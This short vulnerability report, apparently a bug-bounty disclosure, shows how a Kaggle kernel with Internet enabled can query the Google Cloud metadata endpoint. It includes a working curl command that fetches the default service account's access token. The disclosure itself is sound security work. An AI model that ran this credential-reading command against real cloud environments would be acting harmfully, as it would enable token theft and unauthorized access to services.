Summary: Access Google Cloud Metadata on Kaggle Kernel
Steps to reproduce:
Create a kernel on Kaggle.
On the right side, you can turn on Internet. Turn on it.
Copy & Paste below code, and execute it.
%%bash -e
curl -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1beta1/instance/service-accounts/default/token
Attack scenario:
Any user in Kaggle can view the metadata of Google Cloud services. This can cause serious problems with Kaggle's services, including confidential information such as access token.
Acquisition info:
It was March 2017.
https://www.crunchbase.com/acquisition/google-acquires-kaggle--e769329b